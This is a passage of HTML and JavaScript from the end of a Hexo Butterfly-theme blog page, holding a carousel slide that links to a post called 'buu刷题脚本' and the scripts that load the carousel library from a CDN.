onerror="this.src=https://unpkg.zhimg.com/akilar-candyassets/image/loading.gif; this.onerror = null;"/></a><div class="blog-slider__content"><span class="blog-slider__code">2024-09-26</span><a class="blog-slider__title" href="2024/09/26/buu刷题脚本/" alt="">buu刷题脚本</a><div class="blog-slider__text">你永远也不会知道下一次刷新会随机出什么图片</div><a class="blog-slider__button" href="2024/09/26/buu刷题脚本/" alt="">详情   </a></div></div></div><div class="blog-slider__pagination swiper-pagination-clickable swiper-pagination-bullets"></div></div></div>';
    console.log('已挂载butterfly_swiper')
    parent_div_git.insertAdjacentHTML("afterbegin",item_html)
    }
  var elist = 'undefined'.split(',');
  var cpage = location.pathname;
  var epage = 'all';
  var flag = 0;

  for (var i=0;i<elist.length;i++){
    if (cpage.includes(elist[i])){
      flag++;
    }
  }

  if ((epage ==='all')&&(flag == 0)){
    butterfly_swiper_injector_config();
  }
  else if (epage === cpage){
    butterfly_swiper_injector_config();
  }
  </script><script defer src="https://npm.elemecdn.com/hexo-butterfly-swiper/lib/swiper.min.js"></script><script defer data-pjax src="https://npm.elemecdn.com/hexo-butterfly-swiper/lib/swiper_init.js"></script><!-- hexo injector body_end end --></body></html>